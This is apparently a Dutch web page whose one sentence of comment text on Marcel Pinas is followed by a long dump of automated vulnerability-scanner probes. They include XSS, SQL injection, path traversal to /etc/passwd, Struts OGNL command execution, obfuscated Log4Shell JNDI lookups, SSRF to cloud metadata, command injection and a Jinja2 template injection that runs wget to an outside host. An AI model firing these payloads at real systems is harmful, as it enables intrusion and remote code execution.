Veel, heel veel publiciteit radio/TV en vele artikelen die al zijn en nog gepubliceerd gaan worden. Marcel Pinas hij heeft de publiciteit nodig om zijn doel te bereiken. De aanhouder wint.
1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
Veiligheidsscan ForusP
1
Veiligheidsscan ForusP
“‘>
Veiligheidsscan ForusP
‘ onEvent=X2944413264Y2_2Z
Veiligheidsscan ForusP
javascript:qxss(X2944413264Y2_2Z);
Veiligheidsscan ForusP
1″‘>
Veiligheidsscan ForusP
_q=random(X2944413264Y2_2Z)
Veiligheidsscan ForusP
1 _q_q=random(K9n1Mj5H)
Veiligheidsscan ForusP
” SRC=//localhost/j6SHtfJRk>
Veiligheidsscan ForusP
“‘><qssSIJBeZ4y=7;//<
Veiligheidsscan ForusP
Veiligheidsscan ForusP
1″>
Veiligheidsscan ForusP
” onEvent=X2944413264Y2_2Z
Veiligheidsscan ForusP
%3cscript z%3e_q(y)%3c/script%3e
Veiligheidsscan ForusP
q
Content-Type:text/html
Content-Length: 190
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2
AA
Veiligheidsscan ForusP
q
Qualys_resp_hdr_injection: Vulnerable
Veiligheidsscan ForusP
1′
Veiligheidsscan ForusP
#
Veiligheidsscan ForusP
/*
Veiligheidsscan ForusP
,
Veiligheidsscan ForusP
1e309
Veiligheidsscan ForusP
//….//….//….//….//….//….//….//etc/passwd
Veiligheidsscan ForusP
php://filter/read=string.rot13/resource=/etc/passwd
Veiligheidsscan ForusP
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Veiligheidsscan ForusP
%25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Veiligheidsscan ForusP
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
Veiligheidsscan ForusP
|netstat -an
Veiligheidsscan ForusP
“;(function(){qxss7ahv0Y8i});/**/”
Veiligheidsscan ForusP
qualys(aqxssvCg13NpI)xyz
Veiligheidsscan ForusP
9;(function(){qxssj6nONlFl});//
Veiligheidsscan ForusP
9
;(function(){qxss8j55E5iE});//
Veiligheidsscan ForusP
*/;(function(){qxss2u71CsYP});/*
Veiligheidsscan ForusP
“-qxssPT06HXuG()-“
Veiligheidsscan ForusP
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
Veiligheidsscan ForusP
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
Veiligheidsscan ForusP
;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
Veiligheidsscan ForusP
(23.0231*213.759)
Veiligheidsscan ForusP
<!–#config timefmt="” –>qualyswas:
Veiligheidsscan ForusP
http://169.254.169.254/latest/meta-data/
Veiligheidsscan ForusP
http://22b9125ccdeae3ee25c69d8bf10b7d8ab2309b78.1634765810231792.2401144151.ssrf01.ssrf.eu1.qualysperiscope.com.
Veiligheidsscan ForusP
${jndi:ldap://461c04b4d8f4690329a4d839073df8e7771517ac.1634765810231792.1902189974.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://953bfb5fa0ae6bbfe591cdb13917cfaedc3d202a.1634765810231792.4013973936.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${j${::-n}di:ldap${::-:}//8c7048cb1d7d3dab810c29d9ae1aeeb42af69b54.1634765810231792.1727386924.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//7ce7202496787196a5fc04ff8e1713fe6c9c24a2.1634765810231792.1776862305.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//8026959e8c9aee034d7e71a6ab7cfc95e98f9105.1634765810231792.2488950886.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://72c48c524aac1827caa82ff645a3406473060f09.1634765810231792.518250062.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
1′) or 2634=2634 —
Veiligheidsscan ForusP
1′ or 3789=3789 —
Veiligheidsscan ForusP
1 or 4325=4325 —
Veiligheidsscan ForusP
1 or NULL IS NULL
Veiligheidsscan ForusP
1 and NULL IS NULL
Veiligheidsscan ForusP
1′) or ‘swqtp’=’swqtp
Veiligheidsscan ForusP
1′ or ‘tpklq’=’tpklq
Veiligheidsscan ForusP
11 or 11=11
Veiligheidsscan ForusP
1′ or true() or ‘and’ = ‘and
Veiligheidsscan ForusP
1 or true() or ‘and’ = ‘and’
Veiligheidsscan ForusP
1″ or true() or “and” = “and
Veiligheidsscan ForusP
aaaa&ping -n 92 localhost&
Veiligheidsscan ForusP
ping -c2 -i91 localhost
Veiligheidsscan ForusP
|ping -c2 -i91 localhost
Veiligheidsscan ForusP
1WAITFOR DELAY ’00:00:29′
Veiligheidsscan ForusP
1;WAITFOR DELAY ’00:00:29′;
Veiligheidsscan ForusP
1);WAITFOR DELAY ’00:00:29′–
Veiligheidsscan ForusP
1′);WAITFOR DELAY ’00:00:29′–
Veiligheidsscan ForusP
1′,0,0);WAITFOR DELAY’00:00:29′–
Veiligheidsscan ForusP
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
Veiligheidsscan ForusP
1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘
Veiligheidsscan ForusP
1;SELECT sleep(29); —
Veiligheidsscan ForusP
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/
Veiligheidsscan ForusP
1′; var djci=sleep(29*1000);//
Veiligheidsscan ForusP
1′; var djci=sleep(29*1000) + ‘
Veiligheidsscan ForusP
1′ + sleep(29*100*Math.sqrt(100)) + ‘
Veiligheidsscan ForusP
1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
Veiligheidsscan ForusP
${jndi:ldap://5f8a9f657a07d970b6dbd3eb17f27e0422a134ce.1636475110231792.2778060603.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://dd45fa0b3c726fd86720c01ec94aaf4e7c874078.1636475110231792.2137006354.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//1256737650dc99b2927a34d7c7256e64192d152f.1636475110231792.2852720337.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jndi:ldap://d6ca5460da0a41d28c5407f82068cd3cd90dcdfb.1636342510231792.3065817658.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://65b2587f0c0a906d4dae45272346d9c90e0a3a7f.1636342510231792.1771851914.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${j${::-n}di:ldap${::-:}//8c257467ad7b3a5bad39a178fa37be95bcbe1349.1636342510231792.1783544005.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jndi:dns://687accb93aba030c35dda5cda04c8f9ce5239a56.1636342510231792.3032302317.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://81879097ee66c36658584e6221e8480d59309994.1636342510231792.1316309333.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jndi:ldap://70eca1734517d7c0e07198db265de32b526ad484.1637118210231792.2161254033.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://55200f45acada3488e1e39ae81cc026cd1845e8d.1637118210231792.1978598297.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://c147055f60df36755b450e39dfcb241ea7117447.1637118210231792.233373713.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jndi:ldap://3ee4e62f45e7473f5b06373dc6ebb7c1ef082656.1637118610231792.994553586.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jndi:ldap://dc870c2152a2f5a38e9efc462b78315d98dfb754.1644309110231792.472129726.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jndi:dns://315c87be826baa4cb81da118eb7d5ed3d60cdfab.1644309110231792.4123806609.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
_q=random(X149364044Y2_2Z)
Veiligheidsscan ForusP
‘ onEvent=X149364044Y2_2Z
Veiligheidsscan ForusP
” onEvent=X149364044Y2_2Z
Veiligheidsscan ForusP
javascript:qxss(X149364044Y2_2Z);
Veiligheidsscan ForusP
“>
Veiligheidsscan ForusP
z–>
Veiligheidsscan ForusP
1 _q_q=random(SqkDumMv)
Veiligheidsscan ForusP
” SRC=//localhost/j1nPO24yK>
Veiligheidsscan ForusP
“‘><qss9EQ3x7D3=7;//<
Veiligheidsscan ForusP
BODY{background:url(“javascript:qsscB3hgwtt=7”)}
Veiligheidsscan ForusP
qssqK4a4G33=7
Veiligheidsscan ForusP
<script src=http://localhost/j
Veiligheidsscan ForusP
q
Qualys_resp_hdr_injection: Vulnerable
Veiligheidsscan ForusP
qualyswasesi
Veiligheidsscan ForusP
;–
Veiligheidsscan ForusP
“
Veiligheidsscan ForusP
(
Veiligheidsscan ForusP
….//….//….//….//….//….//etc/passwd
Veiligheidsscan ForusP
a(){}phpinfo(); function a
Veiligheidsscan ForusP
http://rfitest/
Veiligheidsscan ForusP
“;(function(){qxss6QzpNrEP});/**/”
Veiligheidsscan ForusP
“);(function(){qxssnRrIM512});/**/”
Veiligheidsscan ForusP
qualys(aqxsskhm2FJvQ)xyz
Veiligheidsscan ForusP
‘;(function(){qxss1Mp92x5x});/**/’
Veiligheidsscan ForusP
9;(function(){qxssLsV7rt6F});//
Veiligheidsscan ForusP
9
;(function(){qxssl368yK6v});//
Veiligheidsscan ForusP
*/;(function(){qxssP4o51LjN});/*
Veiligheidsscan ForusP
‘-qxssx0Z7h800()-‘
Veiligheidsscan ForusP
“-qxss76HdXSzj()-“
Veiligheidsscan ForusP
function(){qxssuX9GNhsI};
Veiligheidsscan ForusP
Joe+
bcc:was_engine@ab099a9d00dbea5481d3816c6b5bf15b709efea4.1647394710231792.929233607.smtphi01.smtp.eu1.qualysperiscope.com.
Veiligheidsscan ForusP
http://3721b8fb5161fc5d99794277ecc5effa94ed9a19.1647394710231792.732776998.ssrf01.ssrf.eu1.qualysperiscope.com.
Veiligheidsscan ForusP
ping -c 2 38965d95b1b4deae9ff7153cd2e4b86f8dfd8ba7.1647394710231792.4179424901.oscomm01.oscomm.eu1.qualysperiscope.com.
Veiligheidsscan ForusP
${jndi:ldap://1bec869fc1c87e2e9506f39f88ae1c59d5e8bdc8.1647394710231792.3589206250.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jndi:rmi://d9c9a9d096d01a8d8225b2a7ee0ceb995882e8cc.1647394710231792.200049609.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://81798af5aa24d2f41e053fb3f951dbb702c8ae20.1647394710231792.1072747213.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://df1165089b3360abb45c1816a163ca02fb350516.1647394710231792.3525915384.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${j${::-n}di:ldap${::-:}//98de0d59b8b696c0888c065dd7e9d2ba00d3ad17.1647394710231792.3479971217.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jnd${123%ff:-${123%ff:-i:}}ldap://163dab7bd174546bdebaea2a84d8c381e08a36ae.1647394710231792.3933946296.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//7acc1e4ea8938745ce1775a596d4acf74509a98c.1647394710231792.4221832301.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${jndi:dns://5552dcb0f7650dd778908e00061e50650b2d336e.1647394710231792.3566758011.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//c167f27e6c3a2b20708e06cbb8de937888d9ea9c.1647394710231792.4292510324.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://383e96009912841815fee362af52d09076c37eb1.1647394710231792.3674592551.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://e87145ace756619e110fb82905772702a952df9f.1647394710231792.3746020778.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
Veiligheidsscan ForusP
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://f078b89543f6b2284d47e48176ee9cd9ad0942e1.1647394710231792.2566342378.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}
Veiligheidsscan ForusP
1′) and 2634=1123 —
1
1
1
“‘>
1
‘ onEvent=X140021438507792Y2_2Z
1
” onEvent=X140021438507792Y2_2Z
1
“>
1
1″‘>
1
z–>
"'>
1
' onEvent=X140021438507792Y3_2Z
1
" onEvent=X140021438507792Y3_2Z
1
1
qss9pZSkwI7=7
1
%3cscript z%3e_q(y)%3c/script%3e
1
qss{{q=(2*2.0)}}qss
1
{{333*334}}
1
q
Content-Type:text/html
Content-Length: 190
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2
AA
1
q
Qualys_resp_hdr_injection: Vulnerable
1
q
Qualys_resp_hdr_injection: Vulnerable
1
qualyswasesi
1
1′
1
;–
1
#
1
/*
1
“
1
,
1
(
1
1e309
1
//….//….//….//….//….//….//….//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
….//….//….//….//….//….//etc/passwd
1
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
a(){}phpinfo(); function a
1
|netstat -an
1
http://rfitest/
1
“;(function(){qxssGwIVq7op});/**/”
1
“);(function(){qxss0cEdlW0T});/**/”
1
qualys(aqxssf4kd8532)xyz
1
‘;(function(){qxss39hiH3h9});/**/’
1
9;(function(){qxssSZ7RRKrA});//
1
9
;(function(){qxssD58IE96t});//
1
*/;(function(){qxss1q6g56UB});/*
1
‘-qxss617SP9Cb()-‘
1
“-qxssVj9h9rnq()-“
1
1!@#$%^&*()
1
!@#$%^&*()1
1
!@#$%^&*()
1
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
1
(23.0231*213.759)
1
<!–#config timefmt="” –>qualyswas:
1
http://169.254.169.254/latest/meta-data/
1
Joe+
bcc:was_engine@94946638f23bbd51f09c1c98feae1f316e048dbd.1768425210231792.741032307.smtphi01.smtp.eu1.qualysperiscope.com.
1
http://952110adb1c446346c56d5a048328fbf1703d548.1768425210231792.3548704588.ssrf01.ssrf.eu1.qualysperiscope.com.
1
1ee1d132944de689c2e8e6373940fad9673155fa.1768425210231792.3832881590.ssrf02.ssrf.eu1.qualysperiscope.com.
1
${jndi:ldap://748d2637f9307c3279ffa82f5e6a81fb66468f49.1768425210231792.3605174985.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://b4066dcb3b35e3b721d36726ed1c0f06b871968f.1768425210231792.959930066.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://2059b1f2255e32017cad77a4b52e8db495578c28.1768425210231792.3455111963.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://27542760eb03984959353453311c8bcfcca666c9.1768425210231792.1888016097.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//564fc2e865493c5f700af21eed18c922fcef84f7.1768425210231792.347913168.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://59cf730340f2f0a986f761ae3d7fe0d55e671723.1768425210231792.3171074698.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//dabf16dfedac82ce205b7e52760f8dcc55664b2f.1768425210231792.2803168822.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${jndi:dns://e2333964323c79682690f4b6ab1a51cfe01d205a.1768425210231792.1618199424.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//e8c3e0949ea5bfbc2fa90db7dab75c6fa0b55a54.1768425210231792.3987385491.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://136ce6054c88125bdfdf2db9a3642dc27455ab11.1768425210231792.1401039065.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://d641aabe9f5be2f3f07b7d895b2b95b4792bd56c.1768425210231792.319058485.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
1
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://75f800f60f32f31dec080ac2ac2f16b9b54324dc.1768425210231792.2692207719.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}
1
1′) or 2634=2634 —
1
1′ or 3789=3789 —
1
1 or 4325=4325 —
1
1 or NULL IS NULL
1
1 and NULL IS NULL
1
1′) or ‘swqtp’=’swqtp
1
1′ or ‘tpklq’=’tpklq
1
11 or 11=11
1
1′ or true() or ‘and’ = ‘and
1
1 or true() or ‘and’ = ‘and’
1
1″ or true() or “and” = “and
1
aaaa&ping -n 92 localhost&
1
ping -c2 -i91 localhost
1
|ping -c2 -i56 localhost
1
|ping -c2 -i91 localhost|
1
1WAITFOR DELAY ’00:00:29′
1
1;WAITFOR DELAY ’00:00:29′;
1
1);WAITFOR DELAY ’00:00:29′–
1
1′;WAITFOR DELAY ’00:00:29′–
1
1′);WAITFOR DELAY ’00:00:29′–
1
1′,0,0);WAITFOR DELAY’00:00:29′–
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘
1
1;SELECT sleep(29); —
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/
1
1′ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime
1
1′ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys
1
1′; var djci=sleep(29*1000);//
1
1′; var djci=sleep(29*1000) + ‘
1
1′ + sleep(29*100*Math.sqrt(100)) + ‘
1
1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))